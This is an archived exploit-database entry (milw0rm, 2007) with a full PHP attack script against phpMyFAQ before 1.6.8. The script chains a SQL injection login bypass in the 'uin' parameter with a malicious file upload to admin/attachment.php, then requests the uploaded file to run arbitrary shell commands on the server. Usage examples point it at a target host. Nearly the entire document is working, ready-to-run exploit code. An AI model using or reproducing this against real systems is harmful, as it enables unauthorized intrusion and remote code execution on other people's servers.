phpMyFAQ 1.6.7 - SQL Injection / Command Execution

EDB-ID:

3393


Author:

elgCrew

Type:

webapps


Platform:

PHP

Date:

2007-03-01


#!/usr/bin/php5-cgi -q
<?

/*
Sql injection / remote command execution exploit for phpmyfaq < 1.6.8

Bugtraq:
https://www.securityfocus.com/bid/21944

CVS:
http://thinkforge.org/plugins/scmcvs/cvsweb.php/phpmyfaq/admin/attachment.php.diff?r1=1.7.2.11.2.5;r2=1.7.2.11.2.6;cvsroot=phpmyfaq;f=h

./pmf.php http://xxxx.xxxx.edu/faq/ "<? system('id'); ?>" localhost:4001

elgCrew@safe-mail.net
*/

function do_upload($baseurl, $proxy, $cmd)
{

	$fp = fopen("kebab.php", "w");
	if(!$fp)
		die("Cannot open file for writing");

	$code = "Un1q" . $cmd . "<? system(\"rm -rf ../1337/\"); ?>";
	fwrite($fp, $code);
	fclose($fp);
	
	$sendvars["aktion"] = "save";
        $sendvars["uin"] = "-1' UNION SELECT char(0x61,0x64,0x6d,0x69,0x6e),char(0x61,0x61,0x27,0x20,0x4f,0x52,0x20,0x31,0x3d,0x31,0x20,0x2f,0x2a) /*";
        $sendvars["save"] = "TRUE";
        $sendvars["MAX_FILE_SIZE"] = "100000";
        $sendvars["id"] = "1337";
        $sendvars["userfile"] = '@kebab.php';
        $sendvars["filename"] = "kebab.php";

        $posturl = $baseurl . "/admin/attachment.php";
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $posturl);

        curl_setopt($ch, CURLOPT_PROXY, $proxy);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_POST, 1);

        curl_setopt($ch, CURLOPT_POSTFIELDS, $sendvars);
        echo "=> Uploading file.\n";
        $result = curl_exec($ch);
	curl_close($ch);
	@unlink("kebab.php");
	$get =  $baseurl . "/attachments/1337/kebab.php\n";

	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $get);
	curl_setopt($ch, CURLOPT_PROXY, $proxy);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	$result = curl_exec($ch);
	if(strstr($result, "Un1q"))
		echo substr($result, 4);
	else
		echo "Not vulnerable / error ?\n";
	curl_close($ch);


}

if($argc < 3)
{
	printf("Usage: %s http://test.com/phpmyfaq/ \"<? system('uname -a'); ?> \" [proxy]\n", $argv[0]);
	exit(0);
}
if($argc == 4)
	$proxy = $argv[3];
else
	$proxy = "";

do_upload($argv[1], $proxy, $argv[2]);

?>

# milw0rm.com [2007-03-01]